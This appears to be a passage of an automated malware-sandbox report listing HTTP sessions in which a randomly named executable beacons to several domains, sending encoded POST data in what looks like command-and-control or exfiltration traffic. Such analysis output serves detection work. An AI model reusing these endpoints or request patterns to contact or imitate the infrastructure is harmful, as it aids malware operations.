                                                  Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e f4 13 5e 75 0e 4f ff b9 09 74 ed 42 62 10 e4 94 04 a6 39 e9 a1 56 63 80 9f 54 1c cf 30 19 49 bb 08 fb 0b 8c 9a 56 74 63 a1 7c d3 97 b2 9c 60 e4 2c 3c 03 70 ca c2 e7 77 6d f2 90 89 bc 30 24 51 87 06 41 ae 8c 4d 07 0e 4b da d0 84 13 f2 0f 71 df fe 77 91 78 b2 5b 8f 1c e0 5a 31 f0 f9 4d 0d 24 00 b3 46 cb ba 7e 7e 6e 85 d8 5f fa 7b fa 0f 93 39 c0 f5 7c 2e 77 97 3e 7c 65 98 a7 16 30 a6 0e e2 da b5 cc fb b6 d7 ce f7 89 f5 c1 4b 78 63 3e dd f7 25 8e 71 85 31 f1 2f 2e 14 d0 c0 4b f8 b0 cb d9 90 c8 ff 78 7b 12 00 fa 0f ec 38 63 4a 0a 13 0b 99 24 a9 c9 05 2f 35 cf 58 21 8c 62 22 56 39 26 54 c5 bc 16 65 96 e7 3a b5 d6 96 5c 67 42 e4 a5 88 99 48 59 c9 54 2e 5c 19 37 90 7e 9c 67 69 5e 08 53 30 6d 99 66 85 70 dc 29 96 a6 39 17 32 cb ac 76 2d ae cd 44 4f 1b 5d 01 4c 01 fe fd 5d da c5 12 b0 8f 34 24 b0 f3 d7 f7 1f a1 b1 7a be 9b 2e 3d 4d 53 2a a9 22 c4 c7 35 62 e6 87 d0 ee [TRUNCATED]
                                                  Data Ascii: 1b98 #MhEJ^3pNN57KNn^uOtBb9VcT0IVtc|`,<pwm0$QAMKqwx[Z1M$F~~n_{9|.w>|e0Kxc>%q1/.Kx{8cJ$/5X!b"V9&Te:\gBHYT.\7~gi^S0mfp)92v-DO]L]4$z.=MS*"5b( +PUUv;Gjr"v1FIe\{^brh@/teGHSK$jK#R*T0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.849800185.27.134.206802648C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 14, 2024 13:51:07.082458973 CET532OUTGET /4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMZMG6cjSawY9sklYa6FSt3/cXLdoz7lp+06E84XgU+l17w== HTTP/1.1
                                                  Host: www.canadavinreport.site
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.5
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Dec 14, 2024 13:51:08.315129995 CET1200INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Sat, 14 Dec 2024 12:51:08 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 999
                                                  Connection: close
                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                  Cache-Control: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                  Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("432479d75ce5c579f6fb522469a33ecf");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMZMG6cjSawY9sklYa6FSt3/cXLdoz7lp+06E84XgU+l17w==&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.84981588.99.61.52802648C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 14, 2024 13:51:14.579996109 CET776OUTPOST /ogj2/ HTTP/1.1
                                                  Host: www.phoenix88.sbs
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.phoenix88.sbs
                                                  Content-Length: 203
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.phoenix88.sbs/ogj2/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 46 2f 34 49 70 6a 72 32 4e 42 30 48 51 42 66 42 38 72 45 6b 4d 6f 31 55 50 31 79 33 75 46 5a 67 65 34 78 6c 49 50 70 59 43 35 38 38 76 6f 36 42 31 31 59 36 76 4f 51 43 6c 64 44 71 37 63 44 6f 74 62 63 62 68 33 71 4d 32 54 7a 62 34 4f 4e 34 37 56 49 38 51 38 6a 58 54 30 48 7a 49 48 44 78 4e 2b 6e 71 41 48 6c 7a 51 45 57 2b 52 42 71 79 6c 53 30 63 2b 45 48 78 44 46 57 52 49 6e 36 6e 4c 4f 38 65 44 74 77 46 4e 55 77 63 64 76 2b 52 53 48 6f 58 6f 4b 38 79 6d 61 73 42 48 2f 68 77 36 61 43 51 45 38 71 65 6d 49 45 7a 49 53 41 53 4c 4e 38 6f 35 6e 42 6e 31 61 42 5a 76 37 47 78 69 7a 31 47 74 6c 38 3d
                                                  Data Ascii: KX=F/4Ipjr2NB0HQBfB8rEkMo1UP1y3uFZge4xlIPpYC588vo6B11Y6vOQCldDq7cDotbcbh3qM2Tzb4ON47VI8Q8jXT0HzIHDxN+nqAHlzQEW+RBqylS0c+EHxDFWRIn6nLO8eDtwFNUwcdv+RSHoXoK8ymasBH/hw6aCQE8qemIEzISASLN8o5nBn1aBZv7Gxiz1Gtl8=
                                                  Dec 14, 2024 13:51:15.940464973 CET1020INHTTP/1.1 302 Found
                                                  Connection: close
                                                  content-type: text/html
                                                  content-length: 771
                                                  date: Sat, 14 Dec 2024 12:51:15 GMT
                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                  location: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.84982188.99.61.52802648C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 14, 2024 13:51:17.235116959 CET796OUTPOST /ogj2/ HTTP/1.1
                                                  Host: www.phoenix88.sbs
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.phoenix88.sbs
                                                  Content-Length: 223
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.phoenix88.sbs/ogj2/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 46 2f 34 49 70 6a 72 32 4e 42 30 48 43 30 50 42 2f 49 73 6b 4b 49 31 58 41 56 79 33 38 46 59 70 65 34 31 6c 49 4f 74 49 43 4b 59 38 76 4e 65 42 30 78 4d 36 6f 4f 51 43 77 74 44 76 6a 38 44 7a 74 62 59 54 68 33 57 4d 32 54 33 62 34 4c 78 34 6e 79 30 2f 51 73 6a 56 4e 55 48 78 58 58 44 78 4e 2b 6e 71 41 48 5a 56 51 45 4f 2b 52 78 61 79 6b 7a 30 62 33 6b 48 79 54 31 57 52 4d 6e 36 6a 4c 4f 39 4a 44 76 56 59 4e 53 38 63 64 75 4f 52 52 57 6f 55 68 4b 38 30 69 61 74 4e 42 50 6b 59 30 36 47 6e 42 64 57 2f 71 49 34 6f 45 45 78 34 52 76 30 75 36 6e 70 4d 31 5a 70 76 71 4d 62 5a 34 51 6c 32 7a 79 6f 4a 63 37 6c 34 77 35 38 71 72 71 39 6b 69 59 48 6f 33 58 59 41
                                                  Data Ascii: KX=F/4Ipjr2NB0HC0PB/IskKI1XAVy38FYpe41lIOtICKY8vNeB0xM6oOQCwtDvj8DztbYTh3WM2T3b4Lx4ny0/QsjVNUHxXXDxN+nqAHZVQEO+Rxaykz0b3kHyT1WRMn6jLO9JDvVYNS8cduORRWoUhK80iatNBPkY06GnBdW/qI4oEEx4Rv0u6npM1ZpvqMbZ4Ql2zyoJc7l4w58qrq9kiYHo3XYA
                                                  Dec 14, 2024 13:51:18.496782064 CET1020INHTTP/1.1 302 Found
                                                  Connection: close
                                                  content-type: text/html
                                                  content-length: 771
                                                  date: Sat, 14 Dec 2024 12:51:18 GMT
                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                  location: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.84982988.99.61.52802648C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 14, 2024 13:51:19.898612976 CET1813OUTPOST /ogj2/ HTTP/1.1
                                                  Host: www.phoenix88.sbs
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.phoenix88.sbs
                                                  Content-Length: 1239
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.phoenix88.sbs/ogj2/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 46 2f 34 49 70 6a 72 32 4e 42 30 48 43 30 50 42 2f 49 73 6b 4b 49 31 58 41 56 79 33 38 46 59 70 65 34 31 6c 49 4f 74 49 43 4b 51 38 73 2f 57 42 31 51 4d 36 70 4f 51 43 73 39 44 75 6a 38 43 68 74 62 67 58 68 33 62 35 32 52 2f 62 35 70 4a 34 72 54 30 2f 62 73 6a 56 46 30 48 79 49 48 44 6f 4e 36 4b 6a 41 42 35 56 51 45 4f 2b 52 33 57 79 6e 69 30 62 37 45 48 78 44 46 57 64 49 6e 36 4c 4c 4f 6b 38 44 76 51 76 4e 69 63 63 63 4f 65 52 65 45 77 55 67 71 38 32 73 36 73 51 42 4f 59 48 30 36 4b 72 42 64 79 5a 71 4c 6f 6f 48 51 67 64 4f 4c 34 34 6d 47 59 2b 32 62 46 5a 6b 4c 32 37 34 44 42 47 75 69 6f 61 62 38 38 56 6c 35 73 39 2b 74 59 51 35 63 62 37 39 51 56 4b 59 7a 62 49 46 59 6d 38 79 54 64 5a 66 63 5a 62 49 64 6e 51 32 34 61 43 4f 6f 6f 74 62 64 62 31 37 4f 39 72 38 65 71 67 4e 33 76 52 65 6a 68 41 37 52 5a 2f 73 67 33 53 66 69 6e 7a 41 38 69 39 32 7a 31 61 79 78 39 42 56 63 42 66 38 72 41 53 34 37 76 31 38 2b 4f 4c 5a 4c 31 71 70 6b 33 33 31 71 73 48 4f 45 67 42 39 44 67 67 39 56 70 63 75 48 63 [TRUNCATED]
                                                  Data Ascii: KX=F/4Ipjr2NB0HC0PB/IskKI1XAVy38FYpe41lIOtICKQ8s/WB1QM6pOQCs9Duj8ChtbgXh3b52R/b5pJ4rT0/bsjVF0HyIHDoN6KjAB5VQEO+R3Wyni0b7EHxDFWdIn6LLOk8DvQvNicccOeReEwUgq82s6sQBOYH06KrBdyZqLooHQgdOL44mGY+2bFZkL274DBGuioab88Vl5s9+tYQ5cb79QVKYzbIFYm8yTdZfcZbIdnQ24aCOootbdb17O9r8eqgN3vRejhA7RZ/sg3SfinzA8i92z1ayx9BVcBf8rAS47v18+OLZL1qpk331qsHOEgB9Dgg9VpcuHcLUERcmuEOKIEseQUP+/BEyqD/4GoI6JKr8nx+7v2HN5pvcY5jwL96PT25MjXYF7fF3ILGACFhgalZ4YTUjDxcHNvAAbdqH+r3X6TpPOBxqO7JIQRCeJ0LmhZH3XidgyvOKoo9IOE4QpMuW7ohsSJ6iGwPtn60uyIQSHmApygpUWM2CclKBGjEoai5+nKdCvhpFLw1ZRNL0+MrZ3yrQ/LtCow2QQfNX8oX73gn99J0eETvK012jrRHAM2YjPxI/7BvCrryaj6KGZg4+m8nbHlaJqe2AiMfK6yLa0OJ+sY6J2SjFSfxlTpLE+FmJ/ToTY8H+xCyACwqvYSMYKzxM3ko/S3wRiyzioewT/6oBKUBjpDycBPHPNBrEgN3WWyYubJB/9/RJshQBxsVMOebaH4kUm4p1W9hAZu5+h8HQWAKukIqLqHX2mRIZHB3nqEvpXRdvJp+bz1voCR5Av+N+ydqQy7VcQ3jJrTTH/9vkPQXMU4Iyzjv0yoBmwqbawgbLniZCe4IYxNX883/ZgMw7QMyGgYxTs/g1PxmoXe3xiFf+4j/uaTUxp4Mw6LeEH7OCpWlICO1ym8boLYmK2SgsLp1l0fd8CuQf68RKpHqFf3hI1ETWjOlNSqxOkjv4TQUfGle8OSBMsc7Z4l4pJR/qnA26EjzeFgIq3d6W [TRUNCATED]
                                                  Dec 14, 2024 13:51:21.155148029 CET1020INHTTP/1.1 302 Found
                                                  Connection: close
                                                  content-type: text/html
                                                  content-length: 771
                                                  date: Sat, 14 Dec 2024 12:51:20 GMT
                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                  location: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.84983688.99.61.52802648C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 14, 2024 13:51:22.558510065 CET525OUTGET /ogj2/?KX=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psKw0iImlr8MkKngr/ag9vs3m2iCqBOJ8/g5hlN9T9LUB2i2IiSBd7rmeCdeR22hTga1oxsx30/DDEHjEXz3Vw==&2VqtG=K0rLevU0Wh5tIJEp HTTP/1.1
                                                  Host: www.phoenix88.sbs
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.5
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Dec 14, 2024 13:51:23.825227022 CET1179INHTTP/1.1 302 Found
                                                  Connection: close
                                                  content-type: text/html
                                                  content-length: 771
                                                  date: Sat, 14 Dec 2024 12:51:23 GMT
                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                  location: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi?KX=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psKw0iImlr8MkKngr/ag9vs3m2iCqBOJ8/g5hlN9T9LUB2i2IiSBd7rmeCdeR22hTga1oxsx30/DDEHjEXz3Vw==&2VqtG=K0rLevU0Wh5tIJEp
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  13192.168.2.849854104.21.90.137802648C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 14, 2024 13:51:29.295617104 CET788OUTPOST /eaqq/ HTTP/1.1
                                                  Host: www.ana-silverco.shop
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.ana-silverco.shop
                                                  Content-Length: 203
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.ana-silverco.shop/eaqq/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 41 7a 47 37 54 54 48 74 2b 67 39 30 4d 4a 51 36 4c 59 37 2b 31 68 58 6e 58 33 35 7a 72 6d 69 77 6a 30 78 6d 33 38 2b 2f 46 32 6b 5a 51 48 72 37 4e 73 66 69 76 31 63 54 61 38 64 4f 4e 2f 41 72 51 6b 62 4e 4a 55 64 49 4d 4d 76 33 75 54 56 6e 45 6b 6f 56 52 5a 43 4f 50 71 6c 42 53 36 71 64 54 79 54 6c 63 53 66 39 56 50 77 49 54 6d 34 64 65 44 65 44 79 73 53 4b 64 4f 4e 72 43 44 6d 31 66 49 49 70 57 73 76 45 49 42 6d 6a 52 77 62 2f 31 2f 77 31 63 61 46 6e 70 70 52 45 74 56 35 41 6b 7a 56 6d 59 6c 66 41 37 36 46 65 6d 68 46 2b 69 55 2b 70 54 69 57 31 72 45 35 35 43 45 43 4a 39 6f 54 79 46 6a 51 3d
